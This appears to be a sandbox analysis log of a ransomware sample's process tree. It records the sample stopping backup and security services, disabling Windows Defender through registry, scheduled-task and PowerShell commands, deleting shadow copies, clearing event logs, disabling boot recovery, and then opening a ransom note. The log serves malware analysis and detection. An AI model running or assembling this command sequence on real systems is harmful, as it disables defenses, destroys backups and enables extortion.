C:\Users\Admin\AppData\Local\Temp\20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe"C:\Users\Admin\AppData\Local\Temp\20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1604
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1172
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1996
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1672
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1700
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1912
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1684
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1184
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1908
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1744
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2004
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1420
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2044
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:988
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1312
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1564
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:568
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:552
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:620
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1080
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1672
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1344
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:612
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1456
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1200
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:860
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1732
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2028
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1920
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1572
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:948
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1592
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1604
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1832
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1176
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1368
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1536
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2040
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1944
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1308
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1548
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1584
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1392
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:592
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1524
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1684
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1608
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1760
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1052
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1688
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1904
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:816
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1140
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2056
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2068
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\etrU_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2428